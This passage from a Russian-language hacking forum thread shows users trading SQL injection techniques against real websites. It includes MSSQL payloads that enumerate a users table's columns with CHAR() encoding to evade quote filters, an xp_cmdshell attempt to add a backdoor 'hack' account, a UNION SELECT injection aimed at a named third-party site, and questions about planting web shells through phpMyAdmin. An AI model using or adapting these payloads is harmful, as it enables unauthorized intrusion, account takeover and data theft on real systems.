more 1 row, mssql не поддерживает limit либо top либо between 1 на одном 2 create procedure() begin ... end, select procedure() 3 top 1 column_name from information_schema.columns where table_name='x'
как бы спрашивал но вопрос теперь в другом) есть mysql-inj с файл_прив=У) при попытке прочитать папку с сайтом ничего не показывает хотя содержимое других папок отображает) как и файлов) может ли быть так что для мускула нет прав прочитать файл или содержимое папки?
Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жесть
Выше, с помощью запроса, который составил l1ght - получаешь первую колонку, а потом not in. А ещё лучше - кинуть ссылку.
(select+top+1+column_name+from+information_schema.columns+where+table_name='users')-- Не работает ) ЗЫ: Не получается составить процедуру к БД =_=. Типо такой: xp_cmdshell [NET USER hack password /ADD] 1+and+1=(select+xp_cmdshell+[NET USER help password /ADD])-- Что-то вроде такоого ).Преобразовывал и в хекс,и в юрл, и наоборот.
(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)+CHAR(115)+CHAR(101)+CHAR(114)+CHAR(115))-- В гете нужно + на %2B менять (select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)%2BCHAR(115)%2BCHAR(101)%2BCHAR(114)%2BCHAR(115))--
Почему когда делаешь вот так - то есть несуществующая колонка. Пишет, что колонки такой нет.. Потом когда подбираешь количество колонок структура запроса уже другая и видно, что колонок вроде как 4. Однако когда делаешь селект - то пишется, что The used SELECT statements have a different number of columns Почему так?
попугай http://www.forestforum.ru/index.php?page=-3+union+select+1,2,3,4,5,version()-- Там не один запрос
Зашибись, а теперь наверное надо построчно угадывать код твоего css? И вообще, http://forum.antichat.ru/thread43254.html
Вопрос: Почему у меня включена директива expose_php и показывается версия интерпретатора РНР,а на http://education.ucsc.edu/phpinfo.php - нет ?
17+and+1=(select+top+1+column_name+from+information_schema.columns+where+table_name=CHAR(117)%2bCHAR(115)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115))-- При запросе выдаёт страницу,но нету ни ошибки,ни вывода из базы.
Ответ : всё там отлично показывает X-Powered-By: PHP/5.1.6 Велемир Давай ссылки на инъёкции, гадания растягиваются на 5 страниц
У меня вот такой вопрос,как можно изменить права докуменка на опший доступ (chmod 777) есле у меня есть только доступ к файлам на сайте через шелл и доступ к MySQL???
Ребята, такой вопрос. Заливаю шелл через phpmyadmin Выскакивает ошибка: В чем косяк? чмода не хвататет? или путь не правильный? или еще чего-то?